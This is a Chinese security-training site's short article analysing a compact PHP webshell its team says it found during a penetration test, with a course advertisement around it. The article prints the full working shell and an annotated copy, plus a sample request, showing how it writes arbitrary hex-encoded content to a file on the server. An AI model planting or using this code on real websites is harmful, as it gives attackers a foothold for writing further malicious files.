天创培训:您身边的信息安全培训专家!
栏目列表
开班计划
2020年4月CISP直播班
主讲老师   张老师、王老师等
开课时间   4月
培训方式   网络课程
授课天次   培训5天+考试半天
上课时间   4月
课程介绍 在线报名
技术中心您当前位置:首页 > 资源专区 > 技术中心

畸形PHP小马源码分析及利用

作者:天创培训  来源:px.tcnet.com.cn  更新时间:2015-04-16  关键词:PHP

pHp的灵活度是大家有目共睹的

pHp木马查杀的却是一大难点

下面是我们团队渗透时捡到的一枚小马

<?php $f=realpath(dirname(__FILE__)."/../").$_POST["z1"];$c=$_POST["z2"];$buf="";for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2));@fwrite(fopen($f,"w"),$buf); echo "1ok";?> 

格式化代码分析发给大家

z1=222.txt&z2=74657374生成 ../222.txt 内容test

<?php 
$f=realpath(dirname(__FILE__)."/../").$_POST["z1"]; //返回生成文件的路径
$c=$_POST["z2"];$buf=""; //z2获取内容到变量c中,初始化变量buf
for($i=0;$i<strlen($c);$i+=2)$buf.=urldecode("%".substr($c,$i,2)); //计次循环,解码c提交上来的内容
@fwrite(fopen($f,"w"),$buf); echo "1ok"; //生成文件
?>



推荐阅读

网站首页 |  关于天创 |  课程体系 |  最新动态 |  联系我们 |  网站地图 |  二维码
版权所有:江苏天创科技有限公司 苏ICP备16028135号-2
苏州总部地址:江苏省苏州市十梓街327号 电话:0512-65129087 传真:0512-65157410 邮编:215000
南京分公司地址:南京珠江路88号新世界中心A座 电话:025-84533276 传真:025-84533286 邮编:210000